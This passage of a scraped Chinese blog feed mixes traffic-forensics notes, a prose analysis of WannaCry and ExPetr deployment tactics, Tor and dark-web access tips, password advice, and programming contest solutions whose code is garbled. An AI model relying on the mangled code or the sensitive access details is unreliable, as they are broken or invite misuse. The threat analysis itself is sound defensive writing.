Netfworks在2001年联合开发的一种网络监控技术，它采用数据流随机采样技术，可以提供完整的，甚至全网络范围内的流量信息，能够提供超大网络流量（如大于10Gbps）环境下的流量分析，用户能够实时、详细的分析网络传输过程中的传输性能、趋势和存在的问题。&#xA;NetFlow是Cisco公司开发的技术，它既是一种交换技术，又是一种流量分析技术，同时也是业界主流的计费技术之一。可以详细统计IP流量的时间、地点、使用协议、访问内容、具体流量。&#xA;C.流量分析在取证中作用&#xA;计算机取证可以分为事后取证和实时取证。而流量分析正是实时取证的重要内容，对原始数据进行网络还原、重现入侵现场具有重要意义。&#xA;事后取证&#xA;事后取证也称为静态取证，是指设备在被入侵后运用各种技术对其进行取证工作。随着网络犯罪的方法和手段的提高，事后取证已不能满足计算机取证的需求。&#xA;实时取证&#xA;实时取证，也被称为动态取证，是指通过设备或软件实时捕获流经网络设备和终端应用的网络数据并分析网络数据的内容，来获取攻击者的企图和攻击者的行为证据。&#xA;利用分析采集后的数据，对网络入侵时间，网络犯罪活动进行证据获取、保存、和还原，流量分析能够真实、持续的捕获网络中发生的各种行为，能够完整的保存攻击者攻击过程中的数据，对保存的原始数据进行网络还原，重现入侵现场。&#xA;四.流量分析取证过程模拟&#xA;下面是我们使用wireshark抓取本地虚拟机网络流量，并使用构建的漏洞环境进行流量取证分析过程的示例模拟，真实还原恶意攻击入侵的全过程。（以下模拟案例、数据是本文分享的主要内容，仅供参考学习。任何人不得用于非法用途，转载请注明出处，否则后果自负。）&#xA;具体操作步骤:</description>
    </item>
    <item>
      <title>Substance Painter 2019中的着色器怎么设置</title>
      <link>https://anwangtanmi.github.io/posts/cece174efdda8433155a8410909d682a/</link>
      <pubDate>Wed, 24 Apr 2019 15:43:27 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/cece174efdda8433155a8410909d682a/</guid>
      <description>Substance Painter 2019MAC是界面和流程都非常清晰的次世代游戏贴图绘制软件，substance painter mac提供了构建3D素材所需的所有工具，包括粒子笔刷，可以模拟自然粒子下落，粒子的轨迹形成纹理。当然还包括了Material Painting材质绘制，可以一次绘出所有的材质。下面我们就介绍一下关于3D绘画软件substance painter mac着色器设置。&#xA;3D绘画软件substance painter mac着色器设置&#xA;着色器设置”窗口允许控制着色器（和Iray mdl）参数。&#xA;着色器是一种函数，用于定义在与视口中的光照和阴影交互时对象的外观。在Substance Painter中，着色器用于了解如何读取纹理集通道并在视口中渲染3D网格。&#xA;撤消堆栈和着色器&#xA;“着色器设置”窗口的此部分控制着色器操作着色器时的主要参数。&#xA;着色器的撤消/重做堆栈独立于主历史记录，以便在绘制时不会产生冲突。&#xA;注意：如果着色器文件标记为“过期”，建议尽可能更新它。&#xA;着色器参数&#xA;着色器参数取决于当前加载的着色器文件。&#xA;着色器实例&#xA;着色器实例是基于原始着色器文件但具有自定义参数的着色器。&#xA;可以在纹理集之间共享着色器实例，而纹理集可以具有唯一的着色器实例。&#xA;例如：项目可以使用基础着色器，而一个纹理集使用自定义着色器来支持不透明度。&#xA;以上就是关于使用3D绘画软件substance painter mac着色器设置的方法，希望能够对你有所帮助。</description>
    </item>
    <item>
      <title>暗网那些事</title>
      <link>https://anwangtanmi.github.io/posts/68dd9fe22a76ba182d9b85d829aeccb4/</link>
      <pubDate>Tue, 23 Apr 2019 18:13:16 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/68dd9fe22a76ba182d9b85d829aeccb4/</guid>
      <description> 心里能力不强的人，请别看。 有些事情还是不要接触比较好， 社会最恶一面不是随随便便就能接触到的， 也不是你能理解的 好吧，忽略上文所说，至于暗网到底是什么，今天就去领略风情 ———&amp;gt; What a fucking thing is this? 好吧，已经无力吐槽，什么鬼东西都出不来，而且也无明显的性暴力篇幅。据说是经过3次代理导致请求缓慢。总之就是——一点也没劲 </description>
    </item>
    <item>
      <title>【青松资讯】网络攻防谋略之勒索软件浅析</title>
      <link>https://anwangtanmi.github.io/posts/827149e77d502a306d25b5cdf97154ee/</link>
      <pubDate>Tue, 23 Apr 2019 14:13:13 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/827149e77d502a306d25b5cdf97154ee/</guid>
      <description>网络攻防从来是一场没有硝烟的战争，攻防双方你来我往，奇技巧谋，各擅胜场。而细究网络攻击案例，不难发现其中潜藏不少兵家谋略。&#xA;A&#xA;暗 渡 陈 仓&#xA;暗渡陈仓是著名兵书《三十六计》中第十九计，全称为“明修栈道，暗渡陈仓”，出自楚汉相争时韩信攻咸阳的典故，常被形容用一些公开不被怀疑的行为来掩藏背后的真实目的。&#xA;某种意义上，2017年上半年造成巨大恐慌的勒索软件 WannaCry 和 ExPetr 便深得此计精髓。&#xA;表面上看来，WannaCry和ExPetr 就是两个单纯的勒索软件，可是真的如此么？——未必。&#xA;这两个勒索软件由两个不同的组织发布传播，除了同样造成惊人的影响力外，这两次攻击还有个共同点便是对经济收益的兴趣缺乏。&#xA;结合之前造成重大影响的勒索软件来看，无论是曾经造成乌克兰电网停摆的BlackEnergy、明显带有政治动机的索尼影业攻击事件中的主角Destover，还是在主要在中东地区扩散的Shamoon、StonedDrill，首先，它们都自带数据擦除功能，其次，这些攻击的发动时间、作用地域都和同期的一些大型政治事件相吻合。&#xA;通过勒索攻击掩盖真正的政治意图已成为一项不断发展并日趋成熟的战术策略。于是我们猜想，WannaCry和ExPetr 是否也是如此。&#xA;WannaCry攻击的部署&#xA;事实上，WannaCry远在其广为人知之前便开始实施部署。我们掌握了一些证据表明，WannaCry部署工作的开展早于公开讨论的时间。&#xA;早于3月14日，攻击者便已通过网络钓鱼来感染目标受害者。网络钓鱼会包含一个指向位于公共网络托管服务的文件的链接。一旦点击链接，会下载一个包含“Job Inquiry – Resume 2017.exe”的压缩包“Resume.zip”，而受害者通常会以为这是一个职场应用。&#xA;此可执行文件保留了修改后的Adobe pdf文件图标，在释放众多恶意程序（造成安装WannaCry的释放器及下载器）的同时，立即打开作为诱饵的应用。以下是是诱饵之一，这可能是一个安全的文件，尽管我们并未在网上找到它。&#xA;大多数针对目标易于入侵（可能缺乏可靠的安全防护策略），位置遍布全球，来历各异。&#xA;而恶意攻击组织在接下来的两个月里，开始在这些目标的机器上部署第一版WannaCry勒索软件。没有任何迹象表明，他们有在这个过程中试图获取比特币。&#xA;利用ETERNALBLUE的DOUBLEPULSAR后门代码及嵌入在勒索软件中的kill switch似乎也更进一步证明了攻击者并没有把精力集中在如何收集比特币上。&#xA;有一段时间，攻击者发出了一系列消息，鼓励用户向他们的钱包支付比特币，这更像是一种”此地无银三百两”的心虚之举。&#xA;这两个月的攻击活动缺少经济收益，某种程度，表明了这些攻击者真正在意的是那些小心隐藏在勒索活动表面下的目的。&#xA;ExPetr部署&#xA;ExPetr部署工作极富技术含量。该病毒针对目标是乌克兰政府的主要办公软件供应商。攻击者还侵入了UA的新闻网站，以便让攻击目标群体不局限于MEDOC网络范围内。&#xA;一旦侵入MEDoc网络，他们就可以访问软件更新组件，并以此进一步在目标客户组织中窃取凭据。侵入事件发生在4月份，而大规模的磁盘擦除则发生在很晚以后。&#xA;此外，并不是所有接收到Telebot部署尝试的系统在之后都会被部署ExPetr。同样，并非所有接受ExPetr部署尝试的系统之前曾被部署过Telebot。&#xA;奇怪的是，采用启动蠕虫的ExPetr有着与前面提到的WannaCry相似的延迟发动。&#xA;攻击者发布了WMI / PsExec / ETERNALBLUE / ETERNALROMANCE武器化的ExPetr版本。从Wannacry的不断升级中，可以看到，即使对Windows系统进行了修补，攻击者也可窃取用于有效横向同级访问的凭证，并且可以擦除/隐藏目标系统。&#xA;这点也意味着，攻击者将目标执着的锁定在乌克兰相关目标网络。蠕虫组件也不会在目标网络之外生成随机网络连接。该变体包括有由本地win64和win32 MSVC编译的Mimikatz启动组件，该组件会释放到磁盘中运行，用于窃取密码，最终获得最高权限，以便于更好的进行传播。&#xA;除了上述共同点外，以上案例还有个特点，就是蠕虫最开始侵入时，并非利用0day漏洞，更多是因为设备本身的脆弱。&#xA;无独有偶，最近关于医疗机构网络安全的一份研究显示，设备的脆弱是重要挑战之一。解决方案具体体现在实际层面就是制定程序，安全计划，实施新的安全技术以及不断培养员工安全意识方面。&#xA;如今电子邮件攻击（以网络钓鱼和勒索软件威胁的形式）数量不断攀升。网在未来Verizon的“ 2017年数据泄露事件报告”还强调了医疗保健行业内勒索软件攻击的升级，而其中最主要的威胁来源出自内部，据统计，其中68％的威胁是内部威胁，而32％来自外部来源。&#xA;通过调查还发现，内部人员和第三方供应商已成为三分之二安全专业人士的首要担忧之处。63％的受访者表示，员工的错误和数据处理不当是他们面临的最大挑战。69%的受访者也表示，第三方供应商在过去一年也是网络安全的重要不稳定因素之一。&#xA;小结&#xA;过去的一年，安全形势很难令人乐观。但是在研究中，我们发现这些安全隐患大部分并不是因为什么0day漏洞，更多是出于安全意识的欠缺，导致设备系统脆弱。所有安全响应计划里，最重要的始终是准备阶段。&#xA;而如今随着技术的不断发展，各种安全威胁不断升级，与之相对的是成本的不断降低，仅靠事后防治很难解决问题，更多的只能通过提前预设安全方案进行安全加固，进行事前防御。&#xA;— end　—&#xA;安全之道，青松知道</description>
    </item>
    <item>
      <title>使用洋葱Tor进入Dark Web</title>
      <link>https://anwangtanmi.github.io/posts/0edaa9f322037eb9d40ac1c0ad03b82b/</link>
      <pubDate>Thu, 18 Apr 2019 09:17:28 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/0edaa9f322037eb9d40ac1c0ad03b82b/</guid>
      <description>首先在google.com上面搜索&#xA;tor browser&#xA;进入下载界面↓↓↓:&#xA;选择你所需要的版本:&#xA;下载并安装到你的电脑上&#xA;随便找个 “楼梯” 可以使用全局代理的那种&#xA;开启成功后，打开你之前安装的 Tor Browser&#xA;成功连接，打开Tor Borwser为如下界面&#xA;键入你找到的 Dark web 网站&#xA;这里提供一个明网的网站&#xA;三W点b一sTG欧R一点抗&#xA;请自行重组上述网站&#xA;#####################################&#xA;建议不要去寻找dark web ，一些内容太过恶心，而且现在也没多少可以正常进入的了</description>
    </item>
    <item>
      <title>H5页面在iOS网页数字颜色自动被改变成蓝色</title>
      <link>https://anwangtanmi.github.io/posts/311169bb14d160b78f7b4a71008d8007/</link>
      <pubDate>Mon, 25 Mar 2019 19:14:32 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/311169bb14d160b78f7b4a71008d8007/</guid>
      <description> 造成该问题的原因在于Safari浏览器的问题：&#xA;解决该问题只需在head标签中添加如下代码即可解决&#xA;&amp;lt;meta name = &#34;format-detection&#34; content = &#34;telephone=no&#34;&amp;gt; </description>
    </item>
    <item>
      <title>tor浏览器安装过程中遇到的问题</title>
      <link>https://anwangtanmi.github.io/posts/44fe270f1328be2a6584ac21f0641b1d/</link>
      <pubDate>Wed, 20 Mar 2019 21:37:51 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/44fe270f1328be2a6584ac21f0641b1d/</guid>
      <description>我在安装过程参考了Tor获得最新网桥ip及设置方法，http://www.mottoin.com/reports/112817.html两篇文章，不过在安装过程中也遇到了一些问题，总结一下。&#xA;一、配置不成功&#xA;一开始我是按照集成的网桥进行连接，如下图的第一个（我们要优先选择集成网桥，如果不行的话，才会选择自定义网桥），我把所有的传输方式都试了也不行，于是我选择了第二个，自定义的网桥直接去https://bridges.torproject.org/bridges这个网址里复制就行，全部复制之后粘贴上去就行。我试了很多次，但都不成功，所以我选择了另一种。另一种获取网桥的方式是发送电子邮件至 [email protected]。注意：必须使用电子邮箱发送请求：Riseup、Gmail 或 Yahoo。邮件内容是get bridges 的邮件，主题随意。几分钟之后，对方发来回复中，一次有3组tor代理地址和端口。我试了邮件给我的网桥，很快就好。&#xA;二、自定义网桥复制的时候，需要全部复制，不要只复制前面的套接字，后面一串也需要</description>
    </item>
    <item>
      <title>网上兼职光鲜表面下暗藏啥？你网络兼职时关心吗？</title>
      <link>https://anwangtanmi.github.io/posts/747c85f5ddffd579ded52b1ff0930098/</link>
      <pubDate>Sun, 24 Feb 2019 21:28:00 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/747c85f5ddffd579ded52b1ff0930098/</guid>
      <description>这个文章是在网上直接转的，我认为说的很有道理。&#xA;太多太多的人只看到了表面，后面的辛苦又有多少人看到&#xA;以淘客来说，我一天只睡三四个小时，这样的生活半年以上， 推广审核等等等。 这样坚持了三年了&#xA;别人只看到了我每天睁眼就挣了好几百，又有谁看到我因为肝的问题吃了多少药， 因为熬夜精神不太好，身体的损伤&#xA;玩小三现在一天挣六七块钱，又有谁看到我刚开始一天只挣二三分钱， 每天都比之前多挣一分钱努力。。。&#xA;很多人羡慕富二代，但是又有多少人看到他父辈的辛苦。。 做人不要眼高手低&#xA;记的以前看过一个文章，， 人人都想当马云&#xA;为什么叫阿里，因为当时一共十八个合伙人。。 到最后合伙人只有六个其它人全部退了。。 最穷的时候只有一台服务器，电费都欠费了。 在北京同样应聘， 他比别人都有能力，结果因为外貌只有他没合格。&#xA;腾迅起步，到处找人投资。。 没有一家看的起。。 其实有空看看这些真的很有用处&#xA;一个竹子可以用三年时候长根，一夜时间长大。。 这叫底蕴&#xA;而不是，你行我也行，，别人能挣钱我为什么不能。。。 就这事太简单了我行我也能。。。 我就是比别人缺个机会等等等&#xA;其实你比别人缺的东西太多太多了，，坚持，，努力，，学习，，成长&#xA;一个朋友的孩子，，幼儿园的时候就全部是双语交流，， 拉丁和钢琴学习。。每年两次出国学习。。 一年学费十七万。。 你用什么跟人家比，这出生就以经是我们终点了。。。 人家底商十七个，一年什么也不做，收租多少钱。 上面说的只是特例， 另一个朋友大连做批发的。。现在做商城了。。最穷的时候站票去沈阳批货。。一坚持就是十年。 说这些有点多了。 努力你没看见不代表别人没有努力。。 最近很多人问我网上兼职的问题，， 吧里也有很多人认为简单，可以不用上班了，， 其实不然，，你挣的钱能达到工资嘛？ 并不能。。。 一天的工资就按六十块钱算。。 你用什么办法可以达到每天六十的收入。。。 靠所谓的刷~单》》？？ 别开玩笑了。。 底蕴底蕴底蕴&#xA;如果你们有时间，酷六每天上传视频， 坚持每天五部，坚持一年，收入一天十多块钱轻松。。 你每天微信加人，一天加二十人，坚持一年，换微信号全部加满。。。天天说话。留下人脉。。 做什么也比别人强&#xA;不要因为网上兼职而放弃工作，， 不要因为别人说的再好而自己迷失，，，不要因为他人的说的而放弃坚持&#xA;2019年网上兼职的趋势给博主的感觉是越来越正规化，也让过去这种小众的挣钱方式逐渐为普通网友了解。当然，大部分人都只是被网上兼职光鲜表面吸引，期许着自己也能在互联网上发掘出点赚钱路子来。&#xA;18年10月和一位同事讨论起每月的薪水，没聊几句我们两个饱受车房婚压力重担的年轻人开始吐槽工资太低，必须搞点副业做做。&#xA;博主一般不太和现实人群提及博客一事，倒是这位同事直接说到：“我想干自媒体，我们村一个人做了几个月自媒体已经买了车。”&#xA;博主虽穷，但一直也在探索发财之路。这好不容易遇到身边活生生例子挣钱了，赶紧追问：“自媒体？哪个平台？做的什么方面内容？”&#xA;这三连问一发出后，同事微微一笑：“呵呵，很简单。他就买个相机，找个人合伙，每天拍视频，发出去就有很多人看。拍得三农方面内容。”&#xA;更加好奇了，又赶紧补刀一句：“什么三农，能再具体点吗？”&#xA;同事不屑的说了句：“他就每天出去抓鱼拍个，回来杀鱼拍个，炖鱼汤一个，吃鱼再拍等等。”&#xA;博主没再问了，开始思考类似这种模式赚钱的可行性。&#xA;还没等我想完，同事把工作手套一扔，自信满满说道：“靠，明年我就辞职干这个去。买个相机就能干，我喜欢钓鱼，我就拍这一类准行。”&#xA;现在已经2019年2月了，博主前几天微信发消息问他：“你辞职没，自媒体干的咋样？”&#xA;他只回复一句：“没有。”&#xA;从当时信誓旦旦的辞职干网络自媒体赚钱，到今年如往年一样来公司搬铁打工。这其中经历了什么，博主不得而知。&#xA;可能是过年给家里说出自己全职干自媒体想法后，被爹妈教训一顿；&#xA;可能是与村里的做自媒体成功人士沟通后，发现并非想象那么简单就退却了；&#xA;可能是过年期间天天吃喝**连买相机的钱都给败光了，没法启动当初的预想了。&#xA;其实同事今年依旧会来上班，博主去年就预测到，只是没想到他还会来的如此积极，大年初七就报到了。&#xA;网上三农方面自媒体，在他口里却是“买个相机，找个合伙人，每天拍视频”如此之简单。&#xA;而吸引这位同事想大干一场的仅仅是看到别人光鲜的表面：干几个月自媒体已经买车。</description>
    </item>
    <item>
      <title>轻重搭配|2019 蓝桥杯省赛 B 组模拟赛(一)第8题</title>
      <link>https://anwangtanmi.github.io/posts/9d817b69aa5eb241d416a3961e950e07/</link>
      <pubDate>Thu, 07 Feb 2019 15:55:04 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/9d817b69aa5eb241d416a3961e950e07/</guid>
      <description> 利用贪心解决&#xA;#include #include using namespace std; vector cp; int n,ans = 0; int main(){ scanf(&#34;%d&#34;, &amp;amp;n); cp.resize(n); for(int i = 0; i &amp;lt; n; i++){ cin&amp;gt;&amp;gt;cp[i]; } sort(cp.begin(), cp.end()); int pos = n/2,ans = n; for(int i = 0; i &amp;lt; n/2; i++){ while(cp[i] * 2 &amp;gt; cp[pos] &amp;amp;&amp;amp;pos &amp;lt; n) pos++; if(pos &amp;gt;= n) break; ans --; pos ++; } cout&amp;lt; </description>
    </item>
    <item>
      <title>计蒜客2019蓝桥杯省赛A组模拟赛（一）题目及解析</title>
      <link>https://anwangtanmi.github.io/posts/b98d5d8c3e947c72ef6bad1fdfa74ccf/</link>
      <pubDate>Sat, 02 Feb 2019 01:28:45 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/b98d5d8c3e947c72ef6bad1fdfa74ccf/</guid>
      <description>蓝桥杯历年真题题目及题解目录汇总 A. 结果填空：阶乘位数 题库链接 分值: 5&#xA;蒜头君对阶乘产生了兴趣，他列出了前 10 个正整数的阶乘以及对应位数的表：&#xA;n n! 位数 1 1 1 2 2 1 3 6 1 4 24 2 5 120 3 6 720 3 7 5040 4 8 40320 5 9 362880 6 10 3628800 7 对于蒜头君来说，再往后就很难计算了。他试图寻找阶乘位数的规律，但是失败了。现在请你帮他计算出第一个正整数的阶乘位数大于等于 10000 的数是多少，即求最小的正整数 n 满足 n! 的位数大于等于 10000。&#xA;答案3249，细节，注意少点new对象，大数类的对象之类的，很耗时间，打牛客的时候入过坑&#xA;import java.math.BigInteger; public class 阶乘位数 { public static void main(String[] args) { BigInteger n = BigInteger.valueOf(1); BigInteger one =BigInteger.</description>
    </item>
    <item>
      <title>如果你在每个平台的密码都一样，那你危险了</title>
      <link>https://anwangtanmi.github.io/posts/8c00f2401f2a4322730ae1e554edbf71/</link>
      <pubDate>Thu, 24 Jan 2019 22:22:10 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/8c00f2401f2a4322730ae1e554edbf71/</guid>
      <description>近日，网上再次爆出某售票软件泄露数千万条用户信息暗网售价炒到 40 万元，距离上次京东泄漏数千万用户信息事件也才过去一年多一点。&#xA;你的信息是否也在其中？&#xA;也许你会说：“我既不买票也不用京东”。那只能说明这次信息泄露不包括你的隐私，但不能证明你的隐私在其他平台没有被泄露。你能看到这篇文章，说明你是一个互联网的用户，使用互联网就有信息泄露的风险。&#xA;售票软件和京东只是被爆出来的代表，大企业尚且如此，那么那些千千万万的小企业呢，我能信任你们吗？&#xA;互联网发展到今天，我们已经不能避免的要使用它，我们注册了各种 app，和手机绑定，和身份证绑定，如果你的信息被泄露，你有想过有什么后果吗？&#xA;先解释一下为什么我说：&#xA;如果你所有平台的密码都一样，那么你危险了。&#xA;举个例子，你就明白了。&#xA;假设你在 a 网站注册了个账号，绑定了你的手机号，绑定了身份证。&#xA;你又在 b 网站注册了一个账号，绑定了你的手机号。&#xA;你在 c，d，e…各种平台注册了账号。&#xA;为了省事，你的所有密码都一样。&#xA;确实，这样很方便，记住一个密码你不仅可以登录微信，也可以登录淘宝，还可以登录CSDN。&#xA;可是有一天某个网站的信息泄露了，那么这就意味着：&#xA;你在所有平台的信息都泄露了。&#xA;因为你的密码都一样，你的手机号都一样。&#xA;事实上，生活中很多人的密码都只有一个，甚至很多张银行卡的密码都一样。&#xA;这样很危险！&#xA;也许你会说，现在密码不会明文保存，都是加密的，不可逆的。&#xA;但是又怎么解释黑市上出现的账号和密码呢？&#xA;不是所有的企业都有能力和意识去加密你的信息，大企业尚且这样，那成千上万的小企业呢？&#xA;所以，密码一定要有针对性的去设计，而不是千篇一律。&#xA;那密码太多记不住该怎么办？&#xA;没关系，我们只用记住一个规则就能让所有平台的密码不一样。&#xA;怎么做呢？举个例子。&#xA;比如你之前你所有平台的密码都是：&#xA;12345&#xA;好了，你现在注册了一个CSDN账号：&#xA;密码可以加个知乎的后缀，这样就能和其他平台做区分了，于是你的密码变成了：&#xA;12345_CSDN&#xA;但是傻子都能看出这个规律，那我们再复杂一点，把知乎换成乎知。&#xA;于是你的密码变成了：&#xA;12345_NDSC&#xA;有一点不好识破了，不过还是不够复杂，那么我们再复杂一点，加个大小写。&#xA;再复杂一点，你是山东济南人：&#xA;JnSd_12345_NDSC&#xA;现在你的密码已经比较安全了，再加一个你喜欢的特殊符号，这里就加感叹号吧，这让你的密码更安全。&#xA;JnSd_12345_NDSC!&#xA;如果不了解你的设定规则，其他人是很难猜出你的密码的含义的，而你只需要记住一个规则就可以根据不同平台推断出你的密码。&#xA;当然，这个规则你不能告诉任何人。&#xA;我这里只是举个例子，这个规则也是我临时想的，你可以想一个只有你自己知道的并且具有创意规则，这样你的密码就是定制化的了。&#xA;这样看来，和之前记忆一个密码相比，你现在记忆的是一个规则，记忆量和记住一个密码是一样的。&#xA;但是这样你的密码会安全很多。&#xA;如果你所有平台的密码都一样，那么请你看完本文之后立马修改。&#xA;除了保障自己的密码安全，我们的隐私也不应该被转让和公开披露。&#xA;前段时间我想注册个脉脉，但是软件非得读取我的通讯录，不给权限不让用，这是必须的吗？&#xA;好的，我妥协，我同意，我用新手机号注册个小号，随意起个名字还不行么？&#xA;但是你最近发给我的推广短信是来搞笑的吗？&#xA;不要让手机成为你的移动监视器。&#xA;你的数据到底有多廉价？&#xA;数千万用户的信息，40 万元，算下来 1 元可以购买好几百条信息。&#xA;确实，这很廉价。&#xA;这些信息可以干什么？&#xA;对于普通人而言，我们因为信息泄露而受到的最大的伤害就是每天接到和受到无穷无尽的推销电话和短信。&#xA;更高级一点的应用就是使用身份证信息，比如购买火车票。&#xA;在乘车早已实名制的情况下，为什么黄牛还能为所欲为。&#xA;那就是因为他们有大量的公民身份信息。&#xA;在抢票的时候，先用你的身份证购买火车票暂存，有客户上门的时候，再把用你的身份信息买的票退了，再用客户的身份信息抢回来。</description>
    </item>
    <item>
      <title>2018 年度读书总结</title>
      <link>https://anwangtanmi.github.io/posts/f17735415d5b959316789a580760f4ba/</link>
      <pubDate>Sat, 05 Jan 2019 21:40:18 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/f17735415d5b959316789a580760f4ba/</guid>
      <description>《暗网》&#xA;这大概可以看成是某种调查文学，向我们揭示一个完全不同的网络世界，犹如浮在水中的冰山，普通人可以看到的只是很小的一部分，还有很多看不到的东西，都隐藏在水面之下。这本书给我的一个强烈感受是参考文献的长度，都快赶上正文了。个人评分三星。&#xA;《告白》&#xA;日本这个民族真的是很奇怪，有些想法，简直难以理解，崇拜强者，讨厌弱者，为了吸引眼球，不惜以杀人来制造轰动效应，而为了证明自己强大，一个软弱善良的人同样可以变得异常残忍。人性的复杂可见一斑，个人评分四星。&#xA;《激荡十年，水大鱼大》&#xA;吴晓波先生的这本书，介绍了 2008 – 2018 中国这十年来的经济，社会变革，以及一些重要的事件。这十年离自己比较近，反而没有之前的《大败局》或者《激荡三十年》读起来那么荡气回肠，时间可能正如中国的改革开放一样，已经走入了深水区，更多的是暗流与回旋。个人评分四星。&#xA;《编码宝典》&#xA;算是一部中规中矩的故事类小说吧，时空交错，几代人的命运交织在一起，作者以一种巧妙的方式将不同人的命运汇聚在某个神奇的岛屿上。个人评分三星半。&#xA;《2001 太空漫游》，《2010 太空漫游》&#xA;科幻小说史上的永恒经典，生命或许只是一种轮回，从来处来，往去处去，个人评分四星半。&#xA;《无敌舰队》&#xA;讲述西班牙的无敌舰队如何被崛起的英国海军打败的故事，中规中矩的历史书，个人评分四星。&#xA;《巷说百物语》，《续巷说百物语》，《后巷说百物语》&#xA;这大概就类似于中国的聊斋吧，怪力乱神，阴阳交错，只能说，大千世界，无奇不有。个人评分四星。&#xA;《百年战争简史》&#xA;英法百年战争，不知是翻译的问题，还是写作的问题，读起来感觉很跳跃，而且有点索然无味。个人评分三星半。&#xA;《神的九十亿个名字》《地光》《童年的终结》《遥远的地球之歌》&#xA;《与罗摩相会》&#xA;都是克拉克的经典科幻小说，个人评分四星。&#xA;《被嫌弃的松子的一生》&#xA;又是一本读完让人觉得心里很堵的书，这是怎样悲惨而又让人感叹的人生呐，日本这个民族，骨子里也是有种浓烈的悲剧色彩吧，平淡的成长，热烈的绽放，悄然地逝去。个人评分四星。&#xA;《克苏鲁神话》&#xA;颇有点爱伦坡的惊悚风，哥特式的恐怖，可惜已无法让我共鸣，可能已经没有那种想象力了吧，不过故事还是讲的挺好的，个人评分四星。&#xA;《活出人生最好的可能》&#xA;作者眼中，中国女性的杰出代表，每个人都有自己的悲欢离合，得意与失意，人生或许就是如此，所有的经历，都变成了感悟，丰富了自己，也丰富了生活。个人评分四星。&#xA;《鼓书艺人》&#xA;老舍先生讲故事总是很能沉住气，娓娓道来的感觉，让你仿佛身临其境，感受着抗战时期，小人物的命运浮沉。&#xA;《骆驼祥子》&#xA;原来完整的故事是这样的悲剧，可能现实就是这样的悲剧吧。&#xA;《万物起源》&#xA;又重新学习了一下从宇宙大爆炸开始，到现在的生命的进化。&#xA;《艺术的故事》&#xA;慕名而读，只可惜自己水平太浅，无法领会其中的奥妙。&#xA;《小李飞刀：多情剑客无情剑》&#xA;古龙先生是个反转与制造悬念的高手，也只有他，能够用大段大段的对白来推动剧情的发展。&#xA;《鱼王》&#xA;俄罗斯盛产文学巨匠，西伯利亚的艰苦生活在作者笔下也能变得充满诗意与传奇。&#xA;《我的天才女友》&#xA;别人的天才女友，别人的精彩故事。&#xA;《一个叫欧维的男人决定去死》&#xA;小清新带着些许小感动。硬汉柔情。&#xA;《百年法》&#xA;《时间的形状》&#xA;相对论史话，还是一知半解啊。&#xA;《地中海三部曲》&#xA;伊斯兰教与基督教的恩怨情仇，都变成了伊斯坦布尔的历史记忆，浩瀚的历史长河，所有的英雄与传奇都已逝去，只留下直指苍穹的清真寺，在天地间静默。&#xA;《活着为了讲述》&#xA;马尔克斯先生的回忆录，告诉你他老人家是怎么走上魔幻现实主义主义这条不归路的。&#xA;《折断的龙骨》&#xA;别样的推理小说，没毛病。&#xA;《金色梦乡》&#xA;面对强大的国家机器，陷入阴谋的弱小个体似乎无处可遁，只能不停的奔逃，何处才是可以让自己安然入睡的金色梦乡呢。&#xA;《未来简史》&#xA;非常佩服作者的脑洞，未来的社会，可能就是阶层越来越固化，资源的配置只会越来越不均衡，所以探索以及享受未来最新成果的，永远都是资源占有最多的那些人。&#xA;《刺杀骑士团长》&#xA;村上春树的这篇小说，读完不知所云，感觉很虚无啊。&#xA;《一句顶一万句》&#xA;刘震云的经典小说，命运或许也是某种轮回，道尽小人物的无奈与挣扎。&#xA;《羊道：前山夏牧场》《羊道：春牧场》&#xA;有些人驾驭文字的能力，似乎是与生俱来的，读李娟的书，就是会有这种感觉，看起来平淡无常的小事，总是给你某种亲切感。坚强，乐观，努力的生活。&#xA;《区块链技术驱动金融》&#xA;帮我科普了一下比特币，可惜还是不太懂。&#xA;《掠夺者》《去吧，摩西》</description>
    </item>
    <item>
      <title>An网有多可怕？其实你也曾游离在它边缘</title>
      <link>https://anwangtanmi.github.io/posts/144b84c436ca500efeb50e6e6d265693/</link>
      <pubDate>Fri, 04 Jan 2019 17:38:52 +0800</pubDate>
      <guid>https://anwangtanmi.github.io/posts/144b84c436ca500efeb50e6e6d265693/</guid>
      <description>暗网、深网、互联网究竟是什么关系 “你听说过暗网吗？”&#xA;当我把这个问题抛给不同人群，得到了几乎全部是肯定的回答，我意识到，这或许是暗网第一次如此广泛的被全社会认知，即便是年过五旬中老年人，在面对这个问题时也不再显得那么的事不关己。&#xA;暗网这个原本局限在IT行业和部分非法业务群体中的名词，在2017年因为中国访美学者章莹颖遇害第一次如此广泛的被大众所认知。对于多数人而言，暗网是一个可怕的地方，它甚至一定程度上导致了犯罪行为的发生。我们且不讨论，是不是当所有人都读“王子与公主/灰姑娘终于幸福的生活在一起”的童话，就会实现和谐社会。但是，本文试图告诉大家，暗网本质是什么，它是不是真的那么可怕。&#xA;暗网、深网、互联网究竟是什么关系 如今我们每个人都上网，我们大多数时间所说的”上网”和”联网”都指的是与互联网的连接，它始于1969年美国的阿帕网，也就是现在的因特网。&#xA;暗网不同于深网&#xA;但如果你在维基百科上搜索”暗网”为关键词，会发现它特别标注了”提示：本条目的主题不是深网。”说明暗网与深网有着明显的不同，而这一点被很多人所混淆：暗网与深网并不是一个概念。&#xA;暗网和深网实际上都是从英文翻译来的，暗网即dark Darknet或Dark Web；深网则译为Deep Web、Dark 